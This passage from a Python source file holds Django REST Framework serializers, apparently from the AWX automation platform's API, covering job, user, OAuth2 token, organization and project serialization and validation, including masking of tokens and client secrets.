True\n extra_kwargs[field_name] = kwargs\n return extra_kwargs\n\n def build_standard_field(self, field_name, model_field):\n # DRF 3.3 serializers.py::build_standard_field() -> utils/field_mapping.py::get_field_kwargs() short circuits\n # when a Model's editable field is set to False. 
The short circuit skips choice rendering.\n #\n # This logic is to force rendering choice's on an uneditable field.\n # Note: Consider expanding this rendering for more than just choices fields\n # Note: This logic works in conjuction with\n if hasattr(model_field, 'choices') and model_field.choices:\n was_editable = model_field.editable\n model_field.editable = True\n\n field_class, field_kwargs = super(BaseSerializer, self).build_standard_field(field_name, model_field)\n if hasattr(model_field, 'choices') and model_field.choices:\n model_field.editable = was_editable\n if was_editable is False:\n field_kwargs['read_only'] = True\n\n # Pass model field default onto the serializer field if field is not read-only.\n if model_field.has_default() and not field_kwargs.get('read_only', False):\n field_kwargs['default'] = field_kwargs['initial'] = model_field.get_default()\n\n # Enforce minimum value of 0 for PositiveIntegerFields.\n if isinstance(model_field, (models.PositiveIntegerField, models.PositiveSmallIntegerField)) and 'choices' not in field_kwargs:\n field_kwargs['min_value'] = 0\n\n # Use custom boolean field that allows null and empty string as False values.\n if isinstance(model_field, models.BooleanField) and not field_kwargs.get('read_only', False):\n field_class = BooleanNullField\n\n # Use custom char or choice field that coerces null to an empty string.\n if isinstance(model_field, (models.CharField, models.TextField)) and not field_kwargs.get('read_only', False):\n if 'choices' in field_kwargs:\n field_class = ChoiceNullField\n else:\n field_class = CharNullField\n\n # Update the message used for the unique validator to use capitalized\n # verbose name; keeps unique message the same as with DRF 2.x.\n opts = self.Meta.model._meta.concrete_model._meta\n for validator in field_kwargs.get('validators', []):\n if isinstance(validator, validators.UniqueValidator):\n unique_error_message = model_field.error_messages.get('unique', None)\n if unique_error_message:\n unique_error_message = unique_error_message % {\n 'model_name': capfirst(opts.verbose_name),\n 'field_label': capfirst(model_field.verbose_name),\n }\n validator.message = unique_error_message\n\n return field_class, field_kwargs\n\n def build_relational_field(self, field_name, relation_info):\n field_class, field_kwargs = super(BaseSerializer, self).build_relational_field(field_name, relation_info)\n # Don't include choices for foreign key fields.\n field_kwargs.pop('choices', None)\n return field_class, field_kwargs\n\n def get_unique_together_validators(self):\n # Allow the model's full_clean method to handle the unique together validation.\n return []\n\n def run_validation(self, data=fields.empty):\n try:\n return super(BaseSerializer, self).run_validation(data)\n except ValidationError as exc:\n # Avoid bug? 
in DRF if exc.detail happens to be a list instead of a dict.\n raise ValidationError(detail=serializers.as_serializer_error(exc))\n\n def get_validation_exclusions(self, obj=None):\n # Borrowed from DRF 2.x - return model fields that should be excluded\n # from model validation.\n cls = self.Meta.model\n opts = cls._meta.concrete_model._meta\n exclusions = [field.name for field in opts.fields]\n for field_name, field in self.fields.items():\n field_name = field.source or field_name\n if field_name not in exclusions:\n continue\n if field.read_only:\n continue\n if isinstance(field, serializers.Serializer):\n continue\n exclusions.remove(field_name)\n # The clean_ methods cannot be ran on many-to-many models\n exclusions.extend([field.name for field in opts.many_to_many])\n return exclusions\n\n def validate(self, attrs):\n attrs = super(BaseSerializer, self).validate(attrs)\n try:\n # Create/update a model instance and run it's full_clean() method to\n # do any validation implemented on the model class.\n exclusions = self.get_validation_exclusions(self.instance)\n obj = self.instance or self.Meta.model()\n for k,v in attrs.items():\n if k not in exclusions:\n setattr(obj, k, v)\n obj.full_clean(exclude=exclusions)\n # full_clean may modify values on the instance; copy those changes\n # back to attrs so they are saved.\n for k in attrs.keys():\n if k not in exclusions:\n attrs[k] = getattr(obj, k)\n except DjangoValidationError as exc:\n # DjangoValidationError may contain a list or dict; normalize into a\n # dict where the keys are the field name and the values are a list\n # of error messages, then raise as a DRF ValidationError. DRF would\n # normally convert any DjangoValidationError to a non-field specific\n # error message; here we preserve field-specific errors raised from\n # the model's full_clean method.\n d = exc.update_error_dict({})\n for k,v in d.items():\n v = v if isinstance(v, list) else [v]\n v2 = []\n for e in v:\n if isinstance(e, DjangoValidationError):\n v2.extend(list(e))\n elif isinstance(e, list):\n v2.extend(e)\n else:\n v2.append(e)\n d[k] = list(map(force_text, v2))\n raise ValidationError(d)\n return attrs\n\n def reverse(self, *args, **kwargs):\n kwargs['request'] = self.context.get('request')\n return reverse(*args, **kwargs)\n\n @property\n def is_detail_view(self):\n if 'view' in self.context:\n if 'pk' in self.context['view'].kwargs:\n return True\n return False\n\n\nclass EmptySerializer(serializers.Serializer):\n pass\n\n\nclass UnifiedJobTemplateSerializer(BaseSerializer):\n # As a base serializer, the capabilities prefetch is not used directly\n _capabilities_prefetch = [\n 'admin', 'execute',\n {'copy': ['jobtemplate.project.use', 'jobtemplate.inventory.use',\n 'workflowjobtemplate.organization.workflow_admin']}\n ]\n\n class Meta:\n model = UnifiedJobTemplate\n fields = ('*', 'last_job_run', 'last_job_failed',\n 'next_job_run', 'status')\n\n def get_related(self, obj):\n res = super(UnifiedJobTemplateSerializer, self).get_related(obj)\n if obj.current_job:\n res['current_job'] = obj.current_job.get_absolute_url(request=self.context.get('request'))\n if obj.last_job:\n res['last_job'] = obj.last_job.get_absolute_url(request=self.context.get('request'))\n if obj.next_schedule:\n res['next_schedule'] = obj.next_schedule.get_absolute_url(request=self.context.get('request'))\n return res\n\n def get_types(self):\n if type(self) is UnifiedJobTemplateSerializer:\n return ['project', 'inventory_source', 'job_template', 'system_job_template', 
'workflow_job_template',]\n else:\n return super(UnifiedJobTemplateSerializer, self).get_types()\n\n def get_sub_serializer(self, obj):\n serializer_class = None\n if type(self) is UnifiedJobTemplateSerializer:\n if isinstance(obj, Project):\n serializer_class = ProjectSerializer\n elif isinstance(obj, InventorySource):\n serializer_class = InventorySourceSerializer\n elif isinstance(obj, JobTemplate):\n serializer_class = JobTemplateSerializer\n elif isinstance(obj, SystemJobTemplate):\n serializer_class = SystemJobTemplateSerializer\n elif isinstance(obj, WorkflowJobTemplate):\n serializer_class = WorkflowJobTemplateSerializer\n return serializer_class\n\n def to_representation(self, obj):\n serializer_class = self.get_sub_serializer(obj)\n if serializer_class:\n serializer = serializer_class(instance=obj, context=self.context)\n # preserve links for list view\n if self.parent:\n serializer.parent = self.parent\n serializer.polymorphic_base = self\n # capabilities prefetch is only valid for these models\n if isinstance(obj, (JobTemplate, WorkflowJobTemplate)):\n serializer.capabilities_prefetch = self._capabilities_prefetch\n else:\n serializer.capabilities_prefetch = None\n return serializer.to_representation(obj)\n else:\n return super(UnifiedJobTemplateSerializer, self).to_representation(obj)\n\n\nclass UnifiedJobSerializer(BaseSerializer):\n show_capabilities = ['start', 'delete']\n event_processing_finished = serializers.BooleanField(\n help_text=_('Indicates whether all of the events generated by this '\n 'unified job have been saved to the database.'),\n read_only=True\n )\n\n class Meta:\n model = UnifiedJob\n fields = ('*', 'unified_job_template', 'launch_type', 'status',\n 'failed', 'started', 'finished', 'elapsed', 'job_args',\n 'job_cwd', 'job_env', 'job_explanation',\n 'execution_node', 'controller_node',\n 'result_traceback', 'event_processing_finished')\n extra_kwargs = {\n 'unified_job_template': {\n 'source': 'unified_job_template_id',\n 'label': 'unified job template',\n },\n 'job_env': {\n 'read_only': True,\n 'label': 'job_env',\n }\n }\n\n def get_types(self):\n if type(self) is UnifiedJobSerializer:\n return ['project_update', 'inventory_update', 'job', 'ad_hoc_command', 'system_job', 'workflow_job',]\n else:\n return super(UnifiedJobSerializer, self).get_types()\n\n def get_related(self, obj):\n res = super(UnifiedJobSerializer, self).get_related(obj)\n if obj.unified_job_template:\n res['unified_job_template'] = obj.unified_job_template.get_absolute_url(request=self.context.get('request'))\n if obj.schedule:\n res['schedule'] = obj.schedule.get_absolute_url(request=self.context.get('request'))\n if isinstance(obj, ProjectUpdate):\n res['stdout'] = self.reverse('api:project_update_stdout', kwargs={'pk': obj.pk})\n elif isinstance(obj, InventoryUpdate):\n res['stdout'] = self.reverse('api:inventory_update_stdout', kwargs={'pk': obj.pk})\n elif isinstance(obj, Job):\n res['stdout'] = self.reverse('api:job_stdout', kwargs={'pk': obj.pk})\n elif isinstance(obj, AdHocCommand):\n res['stdout'] = self.reverse('api:ad_hoc_command_stdout', kwargs={'pk': obj.pk})\n if obj.workflow_job_id:\n res['source_workflow_job'] = self.reverse('api:workflow_job_detail', kwargs={'pk': obj.workflow_job_id})\n return res\n\n def get_summary_fields(self, obj):\n summary_fields = super(UnifiedJobSerializer, self).get_summary_fields(obj)\n if obj.spawned_by_workflow:\n summary_fields['source_workflow_job'] = {}\n try:\n summary_obj = obj.unified_job_node.workflow_job\n except 
UnifiedJob.unified_job_node.RelatedObjectDoesNotExist:\n return summary_fields\n\n for field in SUMMARIZABLE_FK_FIELDS['job']:\n val = getattr(summary_obj, field, None)\n if val is not None:\n summary_fields['source_workflow_job'][field] = val\n\n return summary_fields\n\n def get_sub_serializer(self, obj):\n serializer_class = None\n if type(self) is UnifiedJobSerializer:\n if isinstance(obj, ProjectUpdate):\n serializer_class = ProjectUpdateSerializer\n elif isinstance(obj, InventoryUpdate):\n serializer_class = InventoryUpdateSerializer\n elif isinstance(obj, Job):\n serializer_class = JobSerializer\n elif isinstance(obj, AdHocCommand):\n serializer_class = AdHocCommandSerializer\n elif isinstance(obj, SystemJob):\n serializer_class = SystemJobSerializer\n elif isinstance(obj, WorkflowJob):\n serializer_class = WorkflowJobSerializer\n return serializer_class\n\n def to_representation(self, obj):\n serializer_class = self.get_sub_serializer(obj)\n if serializer_class:\n serializer = serializer_class(instance=obj, context=self.context)\n # preserve links for list view\n if self.parent:\n serializer.parent = self.parent\n serializer.polymorphic_base = self\n # TODO: restrict models for capabilities prefetch, when it is added\n ret = serializer.to_representation(obj)\n else:\n ret = super(UnifiedJobSerializer, self).to_representation(obj)\n\n if 'elapsed' in ret:\n if obj and obj.pk and obj.started and not obj.finished:\n td = now() - obj.started\n ret['elapsed'] = (td.microseconds + (td.seconds + td.days * 24 * 3600) * 10 ** 6) / (10 ** 6 * 1.0)\n ret['elapsed'] = float(ret['elapsed'])\n\n return ret\n\n\nclass UnifiedJobListSerializer(UnifiedJobSerializer):\n\n class Meta:\n fields = ('*', '-job_args', '-job_cwd', '-job_env', '-result_traceback', '-event_processing_finished')\n\n def get_field_names(self, declared_fields, info):\n field_names = super(UnifiedJobListSerializer, self).get_field_names(declared_fields, info)\n # Meta multiple inheritance and -field_name options don't seem to be\n # taking effect above, so remove the undesired fields here.\n return tuple(x for x in field_names if x not in ('job_args', 'job_cwd', 'job_env', 'result_traceback', 'event_processing_finished'))\n\n def get_types(self):\n if type(self) is UnifiedJobListSerializer:\n return ['project_update', 'inventory_update', 'job', 'ad_hoc_command', 'system_job', 'workflow_job']\n else:\n return super(UnifiedJobListSerializer, self).get_types()\n\n def get_sub_serializer(self, obj):\n serializer_class = None\n if type(self) is UnifiedJobListSerializer:\n if isinstance(obj, ProjectUpdate):\n serializer_class = ProjectUpdateListSerializer\n elif isinstance(obj, InventoryUpdate):\n serializer_class = InventoryUpdateListSerializer\n elif isinstance(obj, Job):\n serializer_class = JobListSerializer\n elif isinstance(obj, AdHocCommand):\n serializer_class = AdHocCommandListSerializer\n elif isinstance(obj, SystemJob):\n serializer_class = SystemJobListSerializer\n elif isinstance(obj, WorkflowJob):\n serializer_class = WorkflowJobListSerializer\n return serializer_class\n\n def to_representation(self, obj):\n serializer_class = self.get_sub_serializer(obj)\n if serializer_class:\n serializer = serializer_class(instance=obj, context=self.context)\n ret = serializer.to_representation(obj)\n else:\n ret = super(UnifiedJobListSerializer, self).to_representation(obj)\n if 'elapsed' in ret:\n ret['elapsed'] = float(ret['elapsed'])\n return ret\n\n\nclass UnifiedJobStdoutSerializer(UnifiedJobSerializer):\n\n result_stdout = 
serializers.SerializerMethodField()\n\n class Meta:\n fields = ('result_stdout',)\n\n def get_types(self):\n if type(self) is UnifiedJobStdoutSerializer:\n return ['project_update', 'inventory_update', 'job', 'ad_hoc_command', 'system_job']\n else:\n return super(UnifiedJobStdoutSerializer, self).get_types()\n\n\nclass UserSerializer(BaseSerializer):\n\n password = serializers.CharField(required=False, default='', write_only=True,\n help_text=_('Write-only field used to change the password.'))\n ldap_dn = serializers.CharField(source='profile.ldap_dn', read_only=True)\n external_account = serializers.SerializerMethodField(help_text=_('Set if the account is managed by an external service'))\n is_system_auditor = serializers.BooleanField(default=False)\n show_capabilities = ['edit', 'delete']\n\n class Meta:\n model = User\n fields = ('*', '-name', '-description', '-modified',\n 'username', 'first_name', 'last_name',\n 'email', 'is_superuser', 'is_system_auditor', 'password', 'ldap_dn', 'last_login', 'external_account')\n\n def to_representation(self, obj):\n ret = super(UserSerializer, self).to_representation(obj)\n ret.pop('password', None)\n if obj and type(self) is UserSerializer:\n ret['auth'] = obj.social_auth.values('provider', 'uid')\n return ret\n\n def get_validation_exclusions(self, obj=None):\n ret = super(UserSerializer, self).get_validation_exclusions(obj)\n ret.extend(['password', 'is_system_auditor'])\n return ret\n\n def validate_password(self, value):\n if not self.instance and value in (None, ''):\n raise serializers.ValidationError(_('Password required for new User.'))\n return value\n\n def _update_password(self, obj, new_password):\n # For now we're not raising an error, just not saving password for\n # users managed by LDAP who already have an unusable password set.\n if getattr(settings, 'AUTH_LDAP_SERVER_URI', None):\n try:\n if obj.pk and obj.profile.ldap_dn and not obj.has_usable_password():\n new_password = None\n except AttributeError:\n pass\n if (getattr(settings, 'SOCIAL_AUTH_GOOGLE_OAUTH2_KEY', None) or\n getattr(settings, 'SOCIAL_AUTH_GITHUB_KEY', None) or\n getattr(settings, 'SOCIAL_AUTH_GITHUB_ORG_KEY', None) or\n getattr(settings, 'SOCIAL_AUTH_GITHUB_TEAM_KEY', None) or\n getattr(settings, 'SOCIAL_AUTH_SAML_ENABLED_IDPS', None)) and obj.social_auth.all():\n new_password = None\n if (getattr(settings, 'RADIUS_SERVER', None) or\n getattr(settings, 'TACACSPLUS_HOST', None)) and obj.enterprise_auth.all():\n new_password = None\n if new_password:\n obj.set_password(new_password)\n obj.save(update_fields=['password'])\n\n # Cycle the session key, but if the requesting user is the same\n # as the modified user then inject a session key derived from\n # the updated user to prevent logout. 
This is the logic used by\n # the Django admin's own user_change_password view.\n update_session_auth_hash(self.context['request'], obj)\n elif not obj.password:\n obj.set_unusable_password()\n obj.save(update_fields=['password'])\n\n def get_external_account(self, obj):\n return get_external_account(obj)\n\n def create(self, validated_data):\n new_password = validated_data.pop('password', None)\n is_system_auditor = validated_data.pop('is_system_auditor', None)\n obj = super(UserSerializer, self).create(validated_data)\n self._update_password(obj, new_password)\n if is_system_auditor is not None:\n obj.is_system_auditor = is_system_auditor\n return obj\n\n def update(self, obj, validated_data):\n new_password = validated_data.pop('password', None)\n is_system_auditor = validated_data.pop('is_system_auditor', None)\n obj = super(UserSerializer, self).update(obj, validated_data)\n self._update_password(obj, new_password)\n if is_system_auditor is not None:\n obj.is_system_auditor = is_system_auditor\n return obj\n\n def get_related(self, obj):\n res = super(UserSerializer, self).get_related(obj)\n res.update(dict(\n teams = self.reverse('api:user_teams_list', kwargs={'pk': obj.pk}),\n organizations = self.reverse('api:user_organizations_list', kwargs={'pk': obj.pk}),\n admin_of_organizations = self.reverse('api:user_admin_of_organizations_list', kwargs={'pk': obj.pk}),\n projects = self.reverse('api:user_projects_list', kwargs={'pk': obj.pk}),\n credentials = self.reverse('api:user_credentials_list', kwargs={'pk': obj.pk}),\n roles = self.reverse('api:user_roles_list', kwargs={'pk': obj.pk}),\n activity_stream = self.reverse('api:user_activity_stream_list', kwargs={'pk': obj.pk}),\n access_list = self.reverse('api:user_access_list', kwargs={'pk': obj.pk}),\n tokens = self.reverse('api:o_auth2_token_list', kwargs={'pk': obj.pk}),\n authorized_tokens = self.reverse('api:user_authorized_token_list', kwargs={'pk': obj.pk}),\n personal_tokens = self.reverse('api:user_personal_token_list', kwargs={'pk': obj.pk}),\n ))\n return res\n\n def _validate_ldap_managed_field(self, value, field_name):\n if not getattr(settings, 'AUTH_LDAP_SERVER_URI', None):\n return value\n try:\n is_ldap_user = bool(self.instance and self.instance.profile.ldap_dn)\n except AttributeError:\n is_ldap_user = False\n if is_ldap_user:\n ldap_managed_fields = ['username']\n ldap_managed_fields.extend(getattr(settings, 'AUTH_LDAP_USER_ATTR_MAP', {}).keys())\n ldap_managed_fields.extend(getattr(settings, 'AUTH_LDAP_USER_FLAGS_BY_GROUP', {}).keys())\n if field_name in ldap_managed_fields:\n if value != getattr(self.instance, field_name):\n raise serializers.ValidationError(_('Unable to change %s on user managed by LDAP.') % field_name)\n return value\n\n def validate_username(self, value):\n return self._validate_ldap_managed_field(value, 'username')\n\n def validate_first_name(self, value):\n return self._validate_ldap_managed_field(value, 'first_name')\n\n def validate_last_name(self, value):\n return self._validate_ldap_managed_field(value, 'last_name')\n\n def validate_email(self, value):\n return self._validate_ldap_managed_field(value, 'email')\n\n def validate_is_superuser(self, value):\n return self._validate_ldap_managed_field(value, 'is_superuser')\n\n\nclass UserActivityStreamSerializer(UserSerializer):\n \"\"\"Changes to system auditor status are shown as separate entries,\n so by excluding it from fields here we avoid duplication, which\n would carry some unintended consequences.\n \"\"\"\n class Meta:\n model = 
User\n fields = ('*', '-is_system_auditor')\n\n\nclass BaseOAuth2TokenSerializer(BaseSerializer):\n\n refresh_token = serializers.SerializerMethodField()\n token = serializers.SerializerMethodField()\n ALLOWED_SCOPES = ['read', 'write']\n\n class Meta:\n model = OAuth2AccessToken\n fields = (\n '*', '-name', 'description', 'user', 'token', 'refresh_token',\n 'application', 'expires', 'scope',\n )\n read_only_fields = ('user', 'token', 'expires', 'refresh_token')\n extra_kwargs = {\n 'scope': {'allow_null': False, 'required': False},\n 'user': {'allow_null': False, 'required': True}\n }\n\n def get_token(self, obj):\n request = self.context.get('request', None)\n try:\n if request.method == 'POST':\n return obj.token\n else:\n return CENSOR_VALUE\n except ObjectDoesNotExist:\n return ''\n\n def get_refresh_token(self, obj):\n request = self.context.get('request', None)\n try:\n if not obj.refresh_token:\n return None\n elif request.method == 'POST':\n return getattr(obj.refresh_token, 'token', '')\n else:\n return CENSOR_VALUE\n except ObjectDoesNotExist:\n return None\n\n def get_related(self, obj):\n ret = super(BaseOAuth2TokenSerializer, self).get_related(obj)\n if obj.user:\n ret['user'] = self.reverse('api:user_detail', kwargs={'pk': obj.user.pk})\n if obj.application:\n ret['application'] = self.reverse(\n 'api:o_auth2_application_detail', kwargs={'pk': obj.application.pk}\n )\n ret['activity_stream'] = self.reverse(\n 'api:o_auth2_token_activity_stream_list', kwargs={'pk': obj.pk}\n )\n return ret\n\n def _is_valid_scope(self, value):\n if not value or (not isinstance(value, str)):\n return False\n words = value.split()\n for word in words:\n if words.count(word) > 1:\n return False # do not allow duplicates\n if word not in self.ALLOWED_SCOPES:\n return False\n return True\n\n def validate_scope(self, value):\n if not self._is_valid_scope(value):\n raise serializers.ValidationError(_(\n 'Must be a simple space-separated string with allowed scopes {}.'\n ).format(self.ALLOWED_SCOPES))\n return value\n\n def create(self, validated_data):\n validated_data['user'] = self.context['request'].user\n try:\n return super(BaseOAuth2TokenSerializer, self).create(validated_data)\n except oauth2.AccessDeniedError as e:\n raise PermissionDenied(str(e))\n\n\nclass UserAuthorizedTokenSerializer(BaseOAuth2TokenSerializer):\n\n class Meta:\n extra_kwargs = {\n 'scope': {'allow_null': False, 'required': False},\n 'user': {'allow_null': False, 'required': True},\n 'application': {'allow_null': False, 'required': True}\n }\n\n def create(self, validated_data):\n current_user = self.context['request'].user\n validated_data['token'] = generate_token()\n validated_data['expires'] = now() + timedelta(\n seconds=settings.OAUTH2_PROVIDER['ACCESS_TOKEN_EXPIRE_SECONDS']\n )\n obj = super(UserAuthorizedTokenSerializer, self).create(validated_data)\n obj.save()\n if obj.application:\n RefreshToken.objects.create(\n user=current_user,\n token=generate_token(),\n application=obj.application,\n access_token=obj\n )\n return obj\n\n\nclass OAuth2TokenSerializer(BaseOAuth2TokenSerializer):\n\n def create(self, validated_data):\n current_user = self.context['request'].user\n validated_data['token'] = generate_token()\n validated_data['expires'] = now() + timedelta(\n seconds=settings.OAUTH2_PROVIDER['ACCESS_TOKEN_EXPIRE_SECONDS']\n )\n obj = super(OAuth2TokenSerializer, self).create(validated_data)\n if obj.application and obj.application.user:\n obj.user = obj.application.user\n obj.save()\n if obj.application:\n 
RefreshToken.objects.create(\n user=current_user,\n token=generate_token(),\n application=obj.application,\n access_token=obj\n )\n return obj\n\n\nclass OAuth2TokenDetailSerializer(OAuth2TokenSerializer):\n\n class Meta:\n read_only_fields = ('*', 'user', 'application')\n\n\nclass UserPersonalTokenSerializer(BaseOAuth2TokenSerializer):\n\n class Meta:\n read_only_fields = ('user', 'token', 'expires', 'application')\n\n def create(self, validated_data):\n validated_data['token'] = generate_token()\n validated_data['expires'] = now() + timedelta(\n seconds=settings.OAUTH2_PROVIDER['ACCESS_TOKEN_EXPIRE_SECONDS']\n )\n validated_data['application'] = None\n obj = super(UserPersonalTokenSerializer, self).create(validated_data)\n obj.save()\n return obj\n\n\nclass OAuth2ApplicationSerializer(BaseSerializer):\n\n show_capabilities = ['edit', 'delete']\n\n class Meta:\n model = OAuth2Application\n fields = (\n '*', 'description', '-user', 'client_id', 'client_secret', 'client_type',\n 'redirect_uris', 'authorization_grant_type', 'skip_authorization', 'organization'\n )\n read_only_fields = ('client_id', 'client_secret')\n read_only_on_update_fields = ('user', 'authorization_grant_type')\n extra_kwargs = {\n 'user': {'allow_null': True, 'required': False},\n 'organization': {'allow_null': False},\n 'authorization_grant_type': {'allow_null': False, 'label': _('Authorization Grant Type')},\n 'client_secret': {\n 'label': _('Client Secret')\n },\n 'client_type': {\n 'label': _('Client Type')\n },\n 'redirect_uris': {\n 'label': _('Redirect URIs')\n },\n 'skip_authorization': {\n 'label': _('Skip Authorization')\n },\n }\n\n def to_representation(self, obj):\n ret = super(OAuth2ApplicationSerializer, self).to_representation(obj)\n request = self.context.get('request', None)\n if request.method != 'POST' and obj.client_type == 'confidential':\n ret['client_secret'] = CENSOR_VALUE\n if obj.client_type == 'public':\n ret.pop('client_secret', None)\n return ret\n\n def get_related(self, obj):\n res = super(OAuth2ApplicationSerializer, self).get_related(obj)\n res.update(dict(\n tokens = self.reverse('api:o_auth2_application_token_list', kwargs={'pk': obj.pk}),\n activity_stream = self.reverse(\n 'api:o_auth2_application_activity_stream_list', kwargs={'pk': obj.pk}\n )\n ))\n return res\n\n def get_modified(self, obj):\n if obj is None:\n return None\n return obj.updated\n\n def _summary_field_tokens(self, obj):\n token_list = [{'id': x.pk, 'token': CENSOR_VALUE, 'scope': x.scope} for x in obj.oauth2accesstoken_set.all()[:10]]\n if has_model_field_prefetched(obj, 'oauth2accesstoken_set'):\n token_count = len(obj.oauth2accesstoken_set.all())\n else:\n if len(token_list) < 10:\n token_count = len(token_list)\n else:\n token_count = obj.oauth2accesstoken_set.count()\n return {'count': token_count, 'results': token_list}\n\n def get_summary_fields(self, obj):\n ret = super(OAuth2ApplicationSerializer, self).get_summary_fields(obj)\n ret['tokens'] = self._summary_field_tokens(obj)\n return ret\n\n\nclass OrganizationSerializer(BaseSerializer):\n show_capabilities = ['edit', 'delete']\n\n class Meta:\n model = Organization\n fields = ('*', 'max_hosts', 'custom_virtualenv',)\n\n def get_related(self, obj):\n res = super(OrganizationSerializer, self).get_related(obj)\n res.update(dict(\n projects = self.reverse('api:organization_projects_list', kwargs={'pk': obj.pk}),\n inventories = self.reverse('api:organization_inventories_list', kwargs={'pk': obj.pk}),\n workflow_job_templates = 
self.reverse('api:organization_workflow_job_templates_list', kwargs={'pk': obj.pk}),\n users = self.reverse('api:organization_users_list', kwargs={'pk': obj.pk}),\n admins = self.reverse('api:organization_admins_list', kwargs={'pk': obj.pk}),\n teams = self.reverse('api:organization_teams_list', kwargs={'pk': obj.pk}),\n credentials = self.reverse('api:organization_credential_list', kwargs={'pk': obj.pk}),\n applications = self.reverse('api:organization_applications_list', kwargs={'pk': obj.pk}),\n activity_stream = self.reverse('api:organization_activity_stream_list', kwargs={'pk': obj.pk}),\n notification_templates = self.reverse('api:organization_notification_templates_list', kwargs={'pk': obj.pk}),\n notification_templates_any = self.reverse('api:organization_notification_templates_any_list', kwargs={'pk': obj.pk}),\n notification_templates_success = self.reverse('api:organization_notification_templates_success_list', kwargs={'pk': obj.pk}),\n notification_templates_error = self.reverse('api:organization_notification_templates_error_list', kwargs={'pk': obj.pk}),\n object_roles = self.reverse('api:organization_object_roles_list', kwargs={'pk': obj.pk}),\n access_list = self.reverse('api:organization_access_list', kwargs={'pk': obj.pk}),\n instance_groups = self.reverse('api:organization_instance_groups_list', kwargs={'pk': obj.pk}),\n ))\n return res\n\n def get_summary_fields(self, obj):\n summary_dict = super(OrganizationSerializer, self).get_summary_fields(obj)\n counts_dict = self.context.get('related_field_counts', None)\n if counts_dict is not None and summary_dict is not None:\n if obj.id not in counts_dict:\n summary_dict['related_field_counts'] = {\n 'inventories': 0, 'teams': 0, 'users': 0,\n 'job_templates': 0, 'admins': 0, 'projects': 0}\n else:\n summary_dict['related_field_counts'] = counts_dict[obj.id]\n return summary_dict\n\n def validate(self, attrs):\n obj = self.instance\n view = self.context['view']\n\n obj_limit = getattr(obj, 'max_hosts', None)\n api_limit = attrs.get('max_hosts')\n\n if not view.request.user.is_superuser:\n if api_limit is not None and api_limit != obj_limit:\n # Only allow superusers to edit the max_hosts field\n raise serializers.ValidationError(_('Cannot change max_hosts.'))\n\n return super(OrganizationSerializer, self).validate(attrs)\n\n\nclass ProjectOptionsSerializer(BaseSerializer):\n\n class Meta:\n fields = ('*', 'local_path', 'scm_type', 'scm_url', 'scm_branch',\n 'scm_clean', 'scm_delete_on_update', 'credential', 'timeout',)\n\n def get_related(self, obj):\n res = super(ProjectOptionsSerializer, self).get_related(obj)\n if obj.credential:\n res['credential'] = self.reverse('api:credential_detail',\n kwargs={'pk': obj.credential.pk})\n return res\n\n def validate(self, attrs):\n errors = {}\n\n # Don't allow assigning a local_path used by another project.\n # Don't allow assigning a local_path when scm_type is set.\n valid_local_paths = Project.get_local_path_choices()\n if self.instance:\n scm_type = attrs.get('scm_type', self.instance.scm_type) or u''\n else:\n scm_type = attrs.get('scm_type', u'') or u''\n if self.instance and not scm_type:\n valid_local_paths.append(self.instance.local_path)\n if scm_type:\n attrs.pop('local_path', None)\n if 'local_path' in attrs and attrs['local_path'] not in valid_local_paths:\n errors['local_path'] = _('This path is already being used by another manual project.')\n\n if errors:\n raise serializers.ValidationError(errors)\n\n return super(ProjectOptionsSerializer, self).validate(attrs)\n\n def 
to_representation(self, obj):\n ret = super(ProjectOptionsSerializer, self).to_representation(obj)\n if obj is not None and 'credential' in ret and not obj.credential:\n ret['credential'] = None\n return ret\n\n\nclass ProjectSerializer(UnifiedJobTemplateSerializer, ProjectOptionsSerializer):\n\n status = serializers.ChoiceField(choices=Project.PROJECT_STATUS_CHOICES, read_only=True)\n last_update_failed = serializers.BooleanField(read_only=True)\n last_updated = serializers.DateTimeField(read_only=True)\n show_capabilities = ['start', 'schedule', 'edit', 'delete', 'copy']\n capabilities_prefetch = [\n 'admin', 'update',\n {'copy': 'organization.project_admin'}\n ]\n\n class Meta:\n model = Project\n fields = ('*', 'organization', 'scm_update_on_launch',\n 'scm_update_cache_timeout', 'scm_revision', 'custom_virtualenv',) + \\\n ('last_update_failed', 'last_updated') # Backwards compatibility\n\n def get_related(self, obj):\n res = super(ProjectSerializer, self).get_related(obj)\n res.update(dict(\n teams = self.reverse('api:project_teams_list', kwargs={'pk': obj.pk}),\n playbooks = self.reverse('api:project_playbooks', kwargs={'pk': obj.pk}),\n inventory_files = self.reverse('api:project_inventories', kwargs={'pk': obj.pk}),\n update = self.reverse('api:project_update_view', kwargs={'pk': obj.pk}),\n project_updates = self.reverse('api:project_updates_list', kwargs={'pk': obj.pk}),\n scm_inventory_sources = self.reverse('api:project_scm_inventory_sources', kwargs={'pk': obj.pk}),\n schedules = self.reverse('api:project_schedules_list', kwargs={'pk': obj.pk}),\n activity_stream = self.reverse('api:project_activity_stream_list', kwargs={'pk': obj.pk}),\n notification_templates_any = self.reverse('api:project_notification_templates_any_list', kwargs={'pk': obj.pk}),\n notification_templates_success = self.reverse('api:project_notification_templates_success_list', kwargs={'pk': obj.pk}),\n notification_templates_error = self.reverse('api:project_notification_templates_error_list', kwargs={'pk': obj.pk}),\n access_list = self.reverse('api:project_access_list', kwargs={'pk': obj.pk}),\n object_roles = self.reverse('api:project_object_roles_list', kwargs={'pk': obj.pk}),\n copy = self.reverse('api:project_copy', kwargs={'pk': obj.pk})\n\n ))\n if obj.organization:\n res['organization'] = self.reverse('api:organization_detail',\n kwargs={'pk': obj.organization.pk})\n # Backwards compatibility.\n if obj.current_update:\n res['current_update'] = self.reverse('api:project_update_detail',\n kwargs={'pk': obj.current_update.pk})\n if obj.last_update:\n res['last_update'] = self.reverse('api:project_update_detail',\n kwargs={'pk': obj.last_update.pk})\n return res\n\n def to_representation(self, obj):\n ret = super(ProjectSerializer, self).to_representation(obj)\n if 'scm_revision' in ret and obj.scm_type == '':\n ret['scm_revision'] = ''\n return ret\n\n def validate(self, attrs):\n def get_field_from_model_or_attrs(fd):\n return attrs.get(fd, self.instance and getattr(self.instance, fd) or None)\n\n organization = None\n if 'organization' in attrs:\n organization = attrs['organization']\n elif self.instance:\n organization = self.instance.organization\n\n view = self.context.get('view', None)\n if not organization and not view.request.user.is_superuser:\n # Only allow super users to create orgless projects\n raise serializers.ValidationError(_('Organization is missing'))\n elif get_field_from_model_or_attrs('scm_type') == '':\n for fd in ('scm_update_on_launch', 'scm_delete_on_update', 'scm_clean'):\n 
